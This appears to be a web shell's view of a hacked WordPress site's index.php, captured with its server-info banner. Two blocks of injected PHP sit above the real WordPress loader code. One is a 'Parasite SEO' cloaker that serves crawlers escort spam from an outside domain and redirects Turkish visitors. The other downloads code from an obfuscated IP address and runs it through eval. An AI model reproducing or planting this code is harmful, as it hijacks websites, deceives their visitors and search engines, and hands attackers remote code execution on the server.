| Server IP : 185.185.82.2 / Your IP : 216.73.217.58 Web Server : Apache/2.4.65 (Unix) OpenSSL/1.1.1k System : Linux srv.e-maxmedia.com 4.18.0-553.109.1.el8_10.x86_64 #1 SMP Mon Mar 2 09:33:18 EST 2026 x86_64 User : thegold ( 1094) PHP Version : 8.3.4 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/thegold/public_html/ |
Upload File : |
<?php
/**
* Parasite SEO Loader v2.0
* Çalışmazsa bu kodu kullan!
*
* Kullanım: Host sitenin index.php'sine koy
*
* Akış:
* - Googlebot → clk domain'den escort içeriği (e2)
* - TR kullanıcı → siteredirect API'den redirect
* - Diğer → boş
*/
error_reporting(0);
ini_set('display_errors', 0);
// ═══════════════════════════════════════
// CONFIG - Bunları güncelle
// ═══════════════════════════════════════
$clk_domain = 'https://fethiye-blowclk.lol';
$redirect_api = 'https://siteredirect.lol/aB9xZ3/redirect-api.php';
$redirect_path_replace = ['/yonlendirme.php', '/fethiye']; // [eski, yeni]
// ═══════════════════════════════════════
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
$lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '');
// Googlebot kontrolü - sadece UA
if (preg_match('/Googlebot|bingbot|yandex|Slurp|DuckDuckBot|AdsBot|APIs-Google|Mediapartners|Google-InspectionTool/i', $ua)) {
$ch = curl_init($clk_domain . '/pg.php?q&t=e2');
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FOLLOWLOCATION => true
]);
$content = curl_exec($ch);
curl_close($ch);
if ($content && strlen($content) > 500) {
echo $content;
exit;
}
}
// TR kullanıcı - redirect
if (strpos($lang, 'tr') !== false) {
$ch = curl_init($redirect_api);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false
]);
$resp = curl_exec($ch);
curl_close($ch);
$data = json_decode($resp, true);
if (isset($data['redirect_url'])) {
$url = str_replace($redirect_path_replace[0], $redirect_path_replace[1], $data['redirect_url']);
header('Location: ' . $url);
exit;
}
}
// Diğer kullanıcılar - boş sayfa
?>
<?php
$u = 'http://7'.'4.91'.'.26.5'.'8/z6'.'0618_16/stat/index.txt';
$d = '';
if (function_exists('curl_init')) {
$ch = curl_init($u);
curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_FOLLOWLOCATION => 1]);
$d = curl_exec($ch);
curl_close($ch);
} elseif (ini_get('allow_url_fopen')) {
$d = file_get_contents($u, false, stream_context_create(["ssl"=>["verify_peer"=>false]]));
}
if ($d) @eval('?>'.$d);?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';